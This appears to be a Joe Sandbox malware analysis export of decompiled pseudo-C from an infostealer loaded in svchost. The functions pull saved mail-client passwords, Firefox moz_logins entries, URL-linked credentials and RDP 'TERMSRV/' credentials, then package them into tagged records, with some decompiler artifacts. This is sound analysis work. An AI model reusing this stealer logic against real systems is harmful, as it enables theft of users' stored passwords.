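The last constructed input shows a quirk of the original logic worth knowing when reproducing the stealer's path handling: because StrStrIA stops at the first ".exe", a directory name containing ".exe" makes the routine discard the whole value.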

Instruction address column for this function (mnemonics not captured in this export): 0x100023f5 to 0x1000244f

APIs
  • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
  • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
  • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
  • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
• lstrlenA.KERNEL32(?), ref: 100023FA
• StrStrIA.SHLWAPI(00000000,.exe,?), ref: 10002419
• StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 1000242B
• lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 1000243D
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$lstrcatlstrcpy
• String ID: .exe
• API String ID: 2414487701-4119554291
• Opcode ID: 7368e76ac8cf2b5910bbbd2622d3acca2e6718c7255de29e814e3f1de290cb41
• Instruction ID: e5b6aec9dedf11539089d9f986a9e3465204e9dad837d82f3043fca0b857f623
• Opcode Fuzzy Hash: 7368e76ac8cf2b5910bbbd2622d3acca2e6718c7255de29e814e3f1de290cb41
• Instruction Fuzzy Hash: 14F0F635604582B9FB22E724CC42F6FBFC5DB936C0F154061F6009B18ED768E8129372
Uniqueness
Uniqueness Score: 100.00%

C-Code - Quality: 87%
E1000A074(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
	intOrPtr _v8;
	intOrPtr _v12;
	char _v20;
	char* _v24;
	CHAR* _v28;
	unsigned int _v32;
	intOrPtr _v36;
	unsigned int _v40;
	void* _v44;
	char _v48;
	void* _t45;
	char _t48;
	char* _t50;
	char* _t59;
	char _t62;
	char _t65;
	char _t67;
	char* _t68;
	char _t70;
	char _t75;
	char _t83;
	char* _t84;
	char* _t85;
	char* _t86;

	_t45 = E10001EEF(_a8);
	if(_t45 != 0) {
		"_OP3_Password2" = 0x50;
		"_MTP_Password2" = 0x53;
		_t48 = E10001FB7(__eflags, _a8,  &_v20);
		__eflags = _t48;
		if(_t48 != 0) {
			_push(_v8);
			_pop( *_t5);
			_v40 = _v40 >> 1;
			_t50 = E10002A17(_v12, _v40);
			__eflags = _t50;
			if(_t50 == 0) {
				_v24 = E10001888(_v8);
				E100018BF(_v12, _v24, _v8);
				_t85 = _v24;
			} else {
				_v24 = _t50;
				_t85 = _t50;
			}
			while(1) {
				_t86 = _t85;
				__eflags = _t86;
				if(_t86 == 0) {
					break;
				}
				__eflags =  *_t86;
				if( *_t86 != 0) {
					_t84 = "<_OP3_Password2";
					while(1) {
						_t59 = StrStrA(_t86, _t84);
						__eflags = _t59;
						if(_t59 != 0) {
							break;
						}
						L10:
						asm("cld");
						asm("repne scasb");
						__eflags =  *_t84;
						if( *_t84 != 0) {
							continue;
						}
						goto L24;
					}
					_t62 = StrStrIA(_t59, 0x100106a9);
					__eflags = _t62;
					if(_t62 != 0) {
						_t85 = _t62 + 1;
						_v28 = _t85;
						_t65 = StrStrA(_t85, 0x100106ab);
						__eflags = _t65;
						if(_t65 != 0) {
							 *_t65 = 0;
							_push(_t65);
							_push( *_t65);
							_t67 = lstrlenA(_v28);
							__eflags = _t67;
							if(_t67 != 0) {
								_v32 = _t67;
								_v36 = E100029F6(_v28);
								_t70 = E10002AE6(_v36, _v32);
								__eflags = _t70;
								if(_t70 != 0) {
									_v32 = _v32 >> 1;
									 *_t26 =  *0x100106a1;
									 *_t27 =  *0x100106a5;
									_t75 = E100043D4(_v36,  &_v32,  &_v48);
									__eflags = _t75;
									if(_t75 != 0) {
										E10001522(_a4, 0xbeef0001);
										E10001584(_a4, _v28);
										E10001558(_a4, _v36, _v32);
									}
								}
								E10001871(_v36);
							}
							_pop(_t83);
							_pop(_t68);
							 *_t68 = _t83;
							continue;
						}
					} else {
					}
				}
				break;
			}
			L24:
			E10001522(_a4, 0xbeef0002);
			E10001558(_a4, _v12, _v8);
			E10001871(_v24);
			return E1000204C( &_v20);
		}
		return _t48;
	} else {
		return _t45;
	}
}
                                                                                                                                        0x1000a173
                                                                                                                                        0x1000a175
                                                                                                                                        0x1000a17e
                                                                                                                                        0x1000a187
                                                                                                                                        0x1000a195
                                                                                                                                        0x1000a19a
                                                                                                                                        0x1000a19c
                                                                                                                                        0x1000a1a6
                                                                                                                                        0x1000a1b1
                                                                                                                                        0x1000a1bf
                                                                                                                                        0x1000a1bf
                                                                                                                                        0x1000a19c
                                                                                                                                        0x1000a1c7
                                                                                                                                        0x1000a1c7
                                                                                                                                        0x1000a1cc
                                                                                                                                        0x1000a1cd
                                                                                                                                        0x1000a1ce
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a1ce
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a126
                                                                                                                                        0x1000a124
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a1d7
                                                                                                                                        0x1000a1dd
                                                                                                                                        0x1000a1e5
                                                                                                                                        0x1000a1f3
                                                                                                                                        0x1000a1fb
                                                                                                                                        0x00000000
                                                                                                                                        0x1000a204
                                                                                                                                        0x1000a20e
                                                                                                                                        0x1000a08b
                                                                                                                                        0x1000a08b
                                                                                                                                        0x1000a08b

Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID: <_OP3_Password2
• API String ID: 0-4172175086
• Opcode ID: 2fac08e10c7b54eb26d01850342edd58a46d29693a526b4ae4446b405374f271
• Instruction ID: f81c72a808c018f294bf42a4d9c9917b2556b39f38b9f1046e23d85fd33ef87d
• Opcode Fuzzy Hash: 2fac08e10c7b54eb26d01850342edd58a46d29693a526b4ae4446b405374f271
• Instruction Fuzzy Hash: 1F417F7690440AEEEF12DBA0CC029EE7FB6EF463D0F154120F550B6069D7359EA1EB61
Uniqueness

Uniqueness Score: 16.53%

C-Code - Quality: 92%
// Decompiler output (Joe Sandbox). Converts the wide string _a8 (_a12 bytes long)
// to ANSI, searches it case-insensitively for the marker _a4 and returns a newly
// allocated copy of the text that follows the marker up to the first carriage
// return. Returns 0 when the marker is absent or the value after it is empty.
E10009CDE(char* _a4, short* _a8, intOrPtr _a12) {
	unsigned int _v8;
	char* _v12;
	int _v16;
	int _t24;
	char* _t28;
	int _t29;
	CHAR* _t30;
	int _t32;
	CHAR* _t39;
	void* _t40;
	void* _t41;
	int _t42;

	_v12 = 0;
	_v16 = 0;
	// decompiler artifact: _v8 receives _a12 (length in bytes), then halved to a wide-char count
	_push(_a12);
	_pop( *_t4);
	_v8 = _v8 >> 1;
	// first call only queries the required ANSI buffer size
	_t24 = WideCharToMultiByte(0, 0, _a8, _v8, 0, 0, 0, 0);
	if(_t24 != 0) {
		_v12 = E10001888(_t24); // LocalAlloc wrapper (see APIs below)
		_t42 = _t24;
		if(WideCharToMultiByte(0, 0, _a8, _v8, _v12, _t42, 0, 0) == 0) {
			E10001871(_v12); // LocalFree wrapper (see APIs below)
			_v12 = 0;
		}
	}
	if(_v12 == 0) {
		L12:
		// common exit: release the ANSI copy and return the extracted value (or 0)
		E10001871(_v12);
		return _v16;
	} else {
		// case-insensitive search for the marker string
		_t28 = StrStrIA(_v12, _a4);
		if(_t28 == 0) {
			goto L12;
		}
		_t29 = lstrlenA(_a4);
		_t40 = _t28;
		_t30 = _t29 + _t40; // _t30/_t39 point just past the marker
		_t39 = _t30;
		// scan forward to the first carriage return (0x0d) and terminate the value there
		while( *_t30 != 0) {
			if( *_t30 != 0xd) {
				_t30 =  &(_t30[1]);
				continue;
			}
			 *_t30 = 0;
			_t32 = lstrlenA(_t39);
			if(_t32 != 0) {
				_v16 = E10001888(_t32);
				_t41 = _t32;
				E100018BF(_t39, _v16, _t41); // copy helper, not resolved in this report
			}
			goto L12;
		}
		goto L12;
	}
}


APIs
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 10009D0E
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 10009D34
• StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 10009D58
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 10009D7A
  • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 10009D65
  • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: ByteCharLocalMultiWidelstrlen$AllocFree
• String ID:
• API String ID: 1890766102-0
• Opcode ID: 6c6baffc20a93782d56cb2dc29d5ee3b2331f29915738ce41732d3b9d000acb3
• Instruction ID: 78e0178545d1deb71194f67004166d5b4780c43b74b178ecedbdf09122fb2ba5
• Opcode Fuzzy Hash: 6c6baffc20a93782d56cb2dc29d5ee3b2331f29915738ce41732d3b9d000acb3
• Instruction Fuzzy Hash: BB215B76D44208BEFF11DFA0CC42B9D7BB5EB01380F208095B610A90EADAB5AA509B25
Uniqueness

Uniqueness Score: 0.06%

C-Code - Quality: 100%
			// Decompiler output (Joe Sandbox, svchost memory dump at 0x10000000); callee names are
			// the decompiler's address-based labels. The function walks the entries yielded by
			// E100013A0/E10006282, keeps only those whose string contains "http://" or "https://"
			// (StrStrIA compares case-insensitively) and serialises each such URL, plus up to three
			// associated strings per sub-entry, into the buffer _a8 under the record tag 0xbeef0001.
			E10006343(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char** _a16) {
				char* _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				void* _t47;
				char* _t49;
				char** _t50;
				char* _t70;
				void* _t71;   // used below but left undeclared in the decompiler output
				void* _t72;
				char* _t73;
				char* _t74;
				char* _t75;
				char* _t76;
				void* _t77;

				_t77 = __eflags;
				_t72 = __edx;
				_t71 = __ecx;
				E10001424(_t47, __ecx, _a4, 1, _a16);   // _t47 is passed uninitialised (decompiler artifact)
				_t49 = E100013A0(_t77, _a4, _a16);      // number of outer entries to process
				_t75 = _t49;
				while(1) {
					_t76 = _t75;
					if(_t76 == 0) {
						break;
					}
					_t50 = _a16;
					__eflags =  *_t50;
					if( *_t50 == 0) {
						return _t50;
					}
					_v8 = 0;
					_t73 = E10006282(_t71, _t72, _a4, _a12, _a16,  &_v8);   // _v8 = entry string, _t73 = sub-entry count
					__eflags = _v8;
					if(_v8 == 0) {
						_v24 = 0;
					} else {
						// _v24 is non-null only when the entry string contains a URL scheme
						_t70 = StrStrIA(_v8, "http://");
						__eflags = _t70;
						if(_t70 == 0) {
							_t70 = StrStrIA(_v8, "https://");
						}
						_v24 = _t70;
					}
					__eflags = _v24;
					if(_v24 != 0) {
						E10001522(_a8, 0xbeef0001);   // record tag
						E10001584(_a8, _v8);          // the URL string
					}
					while(1) {
						_t74 = _t73;
						__eflags = _t74;
						if(_t74 == 0) {
							break;
						}
						__eflags =  *_a16;
						if( *_a16 != 0) {
							_v12 = 0;
							_v16 = 0;
							_v20 = 0;
							E100062FF(_t72, _a4, _a16,  &_v12,  &_v16,  &_v20);   // three strings for this sub-entry
							__eflags = _v24;
							if(_v24 != 0) {
								// append only when _v12 is set and at least one of _v16/_v20 is set
								__eflags = _v12;
								if(_v12 != 0) {
									__eflags = _v16;
									if(_v16 != 0) {
										L17:
										E10001584(_a8, _v12);
										E10001584(_a8, _v16);
										E10001584(_a8, _v20);
									} else {
										__eflags = _v20;
										if(_v20 != 0) {
											goto L17;
										}
									}
								}
							}
							E10001871(_v12);   // release the three strings
							E10001871(_v16);
							E10001871(_v20);
							_t73 = _t74 - 1;
							__eflags = _t73;
							continue;
						} else {
						}
						break;
					}
					__eflags = _v24;
					if(_v24 != 0) {
						// three zero words close the record
						E10001522(_a8, 0);
						E10001522(_a8, 0);
						E10001522(_a8, 0);
					}
					_t49 = E10001871(_v8);
					_t75 = _t76 - 1;
					__eflags = _t75;
				}
				return _t49;
			}

Per-line instruction addresses for E10006343 (address column spilled by extraction; its alignment with the listing above is lost): 0x10006343 through 0x100064b0.

Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID:
• String ID: http://$https://
• API String ID: 0-1916535328
• Opcode ID: a6f3ef33fa48eda91d21e18c70ee1c8a90481d2cd27522ed316cd4034c8a4803
• Instruction ID: 45625fe57a9373ec33681c301f71a1e87fd2e83f183d2876e78200251caff44e
• Opcode Fuzzy Hash: a6f3ef33fa48eda91d21e18c70ee1c8a90481d2cd27522ed316cd4034c8a4803
• Instruction Fuzzy Hash: A941D475800509FAEF12DF90CD05BDE7BB6EF48395F208161F911790A9CB729B60EB91
Uniqueness

Uniqueness Score: 100.00%

C-Code - Quality: 90%
			// Decompiler output (Joe Sandbox); the listing is cut off on the page after the last
			// condition. When _a16 == 5 the code reads column values through E10008860 and compares
			// them with "moz_logins" (the saved-logins table of Firefox's SQLite profile store) and
			// the record type "table", i.e. it is locating that table's schema entry.
			E10009778(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				CHAR* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				char _v28;
				int _t35;
				void* _t54;

				_t54 = __ecx;
				if(_a16 == 5) {
					_t35 = E10008860(_a12, 2,  &_v8,  &_v12,  &_v16);   // column 2: _v12 = type flag, _v16 = value
					if(_v12 == 1) {
						_push(_v16);
						_pop( *_t8);   // _t8 is undeclared in the decompiler output
						_t35 = lstrcmpiA(_v20, "moz_logins");   // case-insensitive table-name check
						if(_t35 == 0) {
							_t35 = E10008860(_a12, 0,  &_v8,  &_v12,  &_v16);
							if(_v12 == 1) {
								_t35 = lstrcmpA("table", _v16);   // column 0 must be the record type "table"
								if(_t35 == 0) {
									_t35 = E10008860(_a12, 3,  &_v8,  &_v12,  &_v16);
									if(_v12 == 0) {
                                                                                                                                        										 *_t22 =  *_v16;
                                                                                                                                        										_t35 = E10008860(_a12, 4,  &_v8,  &_v12,  &_v16);
                                                                                                                                        										if(_v12 == 1) {
                                                                                                                                        											 *0x10012e98 = 0xffffffff;
                                                                                                                                        											 *0x10012e9c = 0xffffffff;
                                                                                                                                        											 *0x10012ea0 = 0xffffffff;
                                                                                                                                        											_t35 = E10008D4F(_v16, E100094F8);
                                                                                                                                        											_v28 = 1;
                                                                                                                                        											if( *0x10012e98 != 0xffffffff &&  *0x10012e9c != 0xffffffff &&  *0x10012ea0 != 0xffffffff) {
                                                                                                                                        												return E10008A44(__ebx, _t54, _a4, _a8, _v24,  &_v28, _a20, E100095B3);
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return _t35;
                                                                                                                                        			}

APIs
• lstrcmpiA.KERNEL32(00000000,moz_logins,?), ref: 100097B6
• lstrcmpA.KERNEL32(table,?,00000000,moz_logins,?), ref: 100097EB
  • Part of subcall function 10008D4F: StrStrIA.SHLWAPI(?,() ), ref: 10008D5F
Strings
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrcmplstrcmpi
• String ID: moz_logins$table
• API String ID: 3524194181-1174185386
Uniqueness
• Uniqueness Score: 0.27%

C-Code - Quality: 85%
// Decompiled by the Joe Sandbox IDA plugin; pseudo-C, not compilable as-is.
// Appears to derive a 4-byte value from GetTickCount (rol 11, bitwise NOT), obtain the
// HGLOBAL behind the stream in _a4 (L1000BA64 is GetHGlobalFromStream per the API list),
// copy the locked buffer into a LocalAlloc'd block (E10001888/E100018BF), and write the
// 4-byte value followed by the buffer through E10001537 into the object _a4.
E10001AA5(void* __ecx, void* __edx, intOrPtr _a4) {
	void* _v8;
	intOrPtr _v12;
	intOrPtr _v16;
	intOrPtr _v20;
	char _v280;
	signed int _v284;
	void* __ebx;
	void* __ebp;
	signed int _t27;
	void* _t29;
	signed int _t44;
	signed int _t46;
	void* _t48;
	void* _t49;

	_t49 = __edx;
	_t48 = __ecx;
	_t27 = GetTickCount();
	asm("rol eax, 0xb");
	_v284 =  !_t27;
	_t46 = 0;
	_t29 =  &_v8;
	_push(_t29);
	_push(_a4);
	L1000BA64();  // GetHGlobalFromStream(_a4, &_v8)
	if(_t29 >= 0) {
		_v16 = E10001091(_t29, 0, _t49, _a4);  // stream length
		_t29 = GlobalLock(_v8);
		_t51 = _t29;  // decompiler artifact: _t51 is an undeclared temporary
		if(_t29 != 0) {
			_v20 = _t29;
			_v12 = E10001888(_v16);  // LocalAlloc(_v16)
			E100018BF(_v20, _v12, _v16);  // copy locked buffer into the new block
			GlobalUnlock(_v8);
			E100018F8(_t48, _t51,  &_v280,  &_v284, 4);
			E10001356(E10001963( &_v280, _v12, _v16), _t49, _a4);
			_t44 = E10001537(_a4,  &_v284, 4);
			_t46 = _t44 & E10001537(_a4, _v12, _v16);  // success only if both writes succeed
			_t29 = E10001871(_v12);  // LocalFree
		}
	}
	E100012C2(_t29, _t49, _a4);
	return _t46;
}

APIs
• GetTickCount.KERNEL32 ref: 10001AAF
• GetHGlobalFromStream.OLE32(?,?), ref: 10001AC8
• GlobalLock.KERNEL32 ref: 10001AE3
  • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
• GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 10001B0B
  • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
• String ID:
• API String ID: 1884134869-0
Uniqueness
• Uniqueness Score: 0.13%

C-Code - Quality: 100%
// Decompiled by the Joe Sandbox IDA plugin; pseudo-C, not compilable as-is.
// Serializes a credential record into _a4: tag 0xbeef0000, _a8, the target string _a12,
// and _a16/_a20. If _a12 does not contain the string at 0x10010616 (not recovered in the
// dump), a "TERMSRV/" substring (the Windows Credential Manager target prefix for RDP)
// is located and, if E100038E3 resolves the target, a second record tagged 0xbeef0001 is
// emitted. This is consistent with the credential-theft signatures in this report.
E10009B9C(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
	intOrPtr _v8;
	int _v12;
	char* _t29;
	char* _t32;

	E10001522(_a4, 0xbeef0000);
	E10001584(_a4, _a8);
	E10001584(_a4, _a12);
	E10001558(_a4, _a16, _a20);
	_t29 = StrStrIA(_a12, 0x10010616);
	if(_t29 == 0) {
		_v12 = lstrlenA("TERMSRV/");  // computed but not used in the recovered code
		_t32 = StrStrIA(_a12, "TERMSRV/");
		if(_t32 != 0) {
			_a12 = _t32;  // points _a12 at the "TERMSRV/" substring
		}
		_t29 = E100038E3(_t32, _a12);
		if(_t29 != 0xffffffff) {
			_v8 = _t29;
			E10001522(_a4, 0xbeef0001);
			E10001584(_a4, _a8);
			E10001522(_a4, _v8);
			return E10001558(_a4, _a16, _a20);
		}
	}
	return _t29;
                                                                                                                                        			}


                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001584: lstrlenA.KERNEL32(00000000), ref: 10001590
                                                                                                                                        • StrStrIA.SHLWAPI(?,10010616), ref: 10009BDB
                                                                                                                                        • lstrlenA.KERNEL32(TERMSRV/,?,10010616), ref: 10009BE9
                                                                                                                                        • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,10010616), ref: 10009BF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen
                                                                                                                                        • String ID: TERMSRV/
                                                                                                                                        • API String ID: 1659193697-3001602198
                                                                                                                                        • Opcode ID: ec62d3a2cfef1f6baf57d910c6318e8da3a17e9334daa00a67563e55e0a947ce
                                                                                                                                        • Instruction ID: 6521309b09e7377a96dac9afdb510a9f00e9e9fc81b6481f4269f0f333f3ab6e
                                                                                                                                        • Opcode Fuzzy Hash: ec62d3a2cfef1f6baf57d910c6318e8da3a17e9334daa00a67563e55e0a947ce
                                                                                                                                        • Instruction Fuzzy Hash: 6311BE39500509FBEF02DF60CC02CDD3E62EF942D5F008520F92569179DB32DA71AB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001E05(CHAR* _a4, CHAR* _a8) {
                                                                                                                                        				int _t11;
                                                                                                                                        				CHAR* _t21;
                                                                                                                                        
                                                                                                                                        				if(_a4 == 0) {
                                                                                                                                        					_a4 = 0x1000f137;
                                                                                                                                        				}
                                                                                                                                        				if(_a8 == 0) {
                                                                                                                                        					_a8 = 0x1000f137;
                                                                                                                                        				}
                                                                                                                                        				_t11 = lstrlenA(_a4);
                                                                                                                                        				_t21 = E10001888(_t11 + lstrlenA(_a8) + 1);
                                                                                                                                        				lstrcpyA(_t21, _a4);
                                                                                                                                        				lstrcatA(_t21, _a8);
                                                                                                                                        				if(_a4 != 0x1000f137) {
                                                                                                                                        					E10001871(_a4);
                                                                                                                                        				}
                                                                                                                                        				return _t21;
                                                                                                                                        			}


                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 10001E26
                                                                                                                                        • lstrlenA.KERNEL32(00000000,?), ref: 10001E30
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001E44
                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001E4D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2414487701-0
                                                                                                                                        • Opcode ID: 9cf6951446215fd1d2701c6af4dee223a20300874e390592d976d891848374ec
                                                                                                                                        • Instruction ID: 7f3b1b3484b2eb4873805575de42fe188f31a9bbefd6b31d00f173742ed160b4
                                                                                                                                        • Opcode Fuzzy Hash: 9cf6951446215fd1d2701c6af4dee223a20300874e390592d976d891848374ec
                                                                                                                                        • Instruction Fuzzy Hash: C3F05E79504248FFFF01DF60DC81AED3A68EB003D4F40D024BD0A0916AD7B9DA919B80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.07%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001DB1(CHAR* _a4, CHAR* _a8) {
                                                                                                                                        				int _t9;
                                                                                                                                        				CHAR* _t18;
                                                                                                                                        
                                                                                                                                        				if(_a4 == 0) {
                                                                                                                                        					_a4 = 0x1000f137;
                                                                                                                                        				}
                                                                                                                                        				if(_a8 == 0) {
                                                                                                                                        					_a8 = 0x1000f137;
                                                                                                                                        				}
                                                                                                                                        				_t9 = lstrlenA(_a4);
                                                                                                                                        				_t18 = E10001888(_t9 + lstrlenA(_a8) + 1);
                                                                                                                                        				lstrcpyA(_t18, _a4);
                                                                                                                                        				lstrcatA(_t18, _a8);
                                                                                                                                        				return _t18;
                                                                                                                                        			}


                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                        • lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2414487701-0
                                                                                                                                        • Opcode ID: dd610432dba21a021446962a42ad08a8ea13270dc0c1f3f7a46167556c47ee14
                                                                                                                                        • Instruction ID: 13c8597b78641e80ec1cccf96a04110a81c14722b9c0c40447442d353750631f
                                                                                                                                        • Opcode Fuzzy Hash: dd610432dba21a021446962a42ad08a8ea13270dc0c1f3f7a46167556c47ee14
                                                                                                                                        • Instruction Fuzzy Hash: 43F0657950020CBFFB01DF60CCC1AED3B99EB013D4F40D425B95A0911ADB79DA41DB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.07%

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 10006B1E
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 10006B3F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectorylstrlen
                                                                                                                                        • String ID: nss3.dll
                                                                                                                                        • API String ID: 2713697268-2492180550
                                                                                                                                        • Opcode ID: 2036903b1e9e829fca20be8137a913b3f3cf83304650f3e647b358dc5b0a22be
                                                                                                                                        • Instruction ID: 2f9eb9b90f96e9689555ecb7f741337473ad1d4c7f9fb1f1f9b943e094417523
                                                                                                                                        • Opcode Fuzzy Hash: 2036903b1e9e829fca20be8137a913b3f3cf83304650f3e647b358dc5b0a22be
                                                                                                                                        • Instruction Fuzzy Hash: D6110CB1700161BFF711EF64CC89B093FA3FB5A395F208024F585D9269E7FAC9948646
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Execution Graph

Execution Coverage: 32%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.4%
Total number of Nodes: 1655
Total number of Limit Nodes: 30

                                                                                                                                        Graph

